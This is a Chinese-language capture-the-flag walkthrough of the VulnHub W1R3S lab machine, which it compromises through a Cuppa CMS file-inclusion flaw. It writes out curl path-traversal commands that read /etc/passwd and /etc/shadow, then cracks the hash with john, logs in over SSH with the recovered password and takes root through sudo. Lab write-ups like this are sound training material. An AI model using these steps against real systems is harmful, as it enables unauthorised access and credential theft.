靶机基本信息
靶机下载链接见:
https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip
下载好之后,用vmware打开即可,将网络适配器设置为NAT模式
主机发现
也可以使用nmap进行主机发现
信息收集
简单的全端口扫描:
详细的扫描结果:
从扫描的结果可以看出,存在ftp弱口令
目录扫描:
访问http://192.168.255.187/administrator/installation/
发现是Title[Cuppa CMS]框架!CuppaCMS是一套内容管理系统(CMS)!
使用whatweb进行指纹识别:
漏洞发现
谷歌搜索引擎搜索:Cuppa CMS exploit
EXP的地址链接:https://www.exploit-db.com/exploits/25971
漏洞利用
使用curl工具:
–data-urlencode:在新版本的CURL中,提供了新的选项 --data-urlencode,通过该选项提供的参数会自动转义特殊字符。
命令:curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.255.187/administrator/alerts/alertConfigField.php
关键信息结果:
命令:``curl -s --data-urlencode urlConfig=…/…/…/…/…/…/…/…/…/etc/shadow http://192.168.255.187/administrator/alerts/alertConfigField.php `
关键信息结果:
将shadow文件内容(圈出来的)复制到hash.txt中, 然后使用john命令进行破解: sudo john hash.txt
爆破出结果:用户名:w1r3s
密码:computer
ssh登录:
权限提升
使用命令sudo -l查看当前用户的权限, 可以发现是全权限
是全权限, 可以直接执行sudo su获取root用户权限
读取root文件有那些,发现flag.txt,读取文件内容
整体来说,这个靶机难度较为简单。
免责声明:本文章涉及的知识和技能仅用于学习研究,如有用于非法途径或未被授权的真实网络环境,所造成的后果及连带责任自行承担,与本文作者无关,倡导把安全知识和技能用于正当、正规、正义的途径。